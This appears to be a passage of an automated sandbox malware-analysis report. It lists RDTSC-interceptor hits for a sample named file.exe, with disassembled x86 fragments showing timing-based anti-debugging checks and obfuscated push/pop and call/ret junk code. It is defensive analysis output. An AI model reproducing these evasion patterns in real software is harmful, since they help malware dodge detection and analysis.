                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A70 second address: E30A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A76 second address: E30ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jnc 00007F60F0C8AB69h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F60F0C8AB5Eh 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30ABE second address: E30AEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F60F0BA102Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jmp 00007F60F0BA1037h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30AEE second address: E30B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b jl 00007F60F0C8AB56h 0x00000011 lea ebx, dword ptr [ebp+1245286Dh] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F60F0C8AB58h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D17BCh], esi 0x00000037 mov edx, dword ptr [ebp+122D3444h] 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F60F0C8AB69h 0x00000044 push eax 0x00000045 push edx 0x00000046 jnl 00007F60F0C8AB56h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30C09 second address: E30C13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30C13 second address: E30C49 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F0C8AB58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 327B780Ch 0x00000013 jg 00007F60F0C8AB5Ah 0x00000019 mov dx, 9CB4h 0x0000001d lea ebx, dword ptr [ebp+12452876h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F60F0C8AB5Eh 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30C49 second address: E30C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30D06 second address: E30D63 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F60F0C8AB69h 0x00000011 jnc 00007F60F0C8AB5Ch 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d jne 00007F60F0C8AB5Ch 0x00000023 jmp 00007F60F0C8AB61h 0x00000028 popad 0x00000029 mov eax, dword ptr [eax] 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e push edi 0x0000002f pop edi 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30D63 second address: E30E22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F60F0BA1035h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F60F0BA1033h 0x00000014 pop eax 0x00000015 jl 00007F60F0BA1026h 0x0000001b xor dword ptr [ebp+122D33D3h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F60F0BA1028h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d push 00000000h 0x0000003f jng 00007F60F0BA102Ch 0x00000045 mov dword ptr [ebp+122D20BEh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push ecx 0x00000050 call 00007F60F0BA1028h 0x00000055 pop ecx 0x00000056 mov dword ptr [esp+04h], ecx 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc ecx 0x00000063 push ecx 0x00000064 ret 0x00000065 pop ecx 0x00000066 ret 0x00000067 jl 00007F60F0BA1029h 0x0000006d movzx edi, di 0x00000070 push BB8E6E64h 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F60F0BA1039h 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30E22 second address: E30E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30E28 second address: E30E49 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 7B8E6E64h 0x00000013 lea ebx, dword ptr [ebp+12452881h] 0x00000019 movzx edx, ax 0x0000001c push eax 0x0000001d pushad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50A2E second address: E50A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50BB3 second address: E50BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA102Eh 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F60F0BA1031h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F60F0BA1026h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50BE1 second address: E50BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F60F0C8AB6Ch 0x0000000c jmp 00007F60F0C8AB60h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50D8B second address: E50D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50D8F second address: E50DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F0C8AB62h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E510A6 second address: E510B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E510B8 second address: E510E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB5Dh 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F60F0C8AB63h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E510E3 second address: E5110A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60F0BA102Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60F0BA102Eh 0x00000012 ja 00007F60F0BA1026h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51266 second address: E5126A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5126A second address: E51287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F60F0BA102Eh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51415 second address: E5145D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F60F0C8AB66h 0x00000011 pushad 0x00000012 jnp 00007F60F0C8AB56h 0x00000018 jmp 00007F60F0C8AB65h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44950 second address: E44956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44956 second address: E44960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F60F0C8AB56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44960 second address: E44966 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5233A second address: E52343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E52343 second address: E52349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E55CF1 second address: E55CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E20724 second address: E20728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57B80 second address: E57B8E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57B8E second address: E57B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57B92 second address: E57BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F60F0C8AB64h 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F60F0C8AB56h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5818F second address: E581A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jl 00007F60F0BA1026h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56A14 second address: E56A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F0C8AB5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58279 second address: E5827D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5827D second address: E58283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D517 second address: E5D51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D51B second address: E5D527 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60F0C8AB56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D527 second address: E5D54E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0BA1037h 0x00000008 js 00007F60F0BA1032h 0x0000000e jp 00007F60F0BA1026h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D54E second address: E5D559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D559 second address: E5D55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D55D second address: E5D578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F60F0C8AB56h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D6CC second address: E5D6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D6D0 second address: E5D6EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F0C8AB65h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DC16 second address: E5DC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F0BA102Ch 0x0000000c jbe 00007F60F0BA1026h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DC2B second address: E5DC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB63h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F60F0C8AB67h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DDB8 second address: E5DDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DDBF second address: E5DDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F60F0C8AB56h 0x00000009 je 00007F60F0C8AB56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DF02 second address: E5DF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1032h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E7F6 second address: E5E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E8E8 second address: E5E8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E8F5 second address: E5E910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F0C8AB5Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E910 second address: E5E936 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 or edi, dword ptr [ebp+122D1B4Eh] 0x0000000e push E19D5980h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F0BA1031h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E936 second address: E5E93B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EA6E second address: E5EA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EA72 second address: E5EA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EC18 second address: E5EC1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F52B second address: E5F531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F66C second address: E5F683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60F0BA102Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F8A8 second address: E5F8AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA51 second address: E5FA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA55 second address: E5FA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA5F second address: E5FA6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA6C second address: E5FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA70 second address: E5FA79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FAF6 second address: E5FAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FAFA second address: E5FAFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FAFF second address: E5FB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jne 00007F60F0C8AB5Bh 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E609F5 second address: E609F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E609F9 second address: E609FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6080E second address: E6082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F0BA102Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 js 00007F60F0BA1026h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6082D second address: E60847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60F0C8AB65h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A0ED second address: E6A0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F60F0BA1026h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B40 second address: E63B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A0FB second address: E6A0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B44 second address: E63B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c jnp 00007F60F0C8AB5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A0FF second address: E6A111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F60F0BA1026h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B6C second address: E63B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A111 second address: E6A115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B73 second address: E63B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A115 second address: E6A11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6BF6E second address: E6BF73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6BF73 second address: E6BFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F60F0BA1028h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb bh, FFFFFFC1h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F60F0BA1028h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+122D1895h] 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+122D294Ch] 0x0000004f xchg eax, esi 0x00000050 push ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F60F0BA1036h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6CF6D second address: E6CF72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6CF72 second address: E6CFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F60F0BA1028h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edi, 56AD52E7h 0x00000027 cmc 0x00000028 push 00000000h 0x0000002a mov bx, si 0x0000002d mov di, E6A4h 0x00000031 push 00000000h 0x00000033 mov edi, 145AC298h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
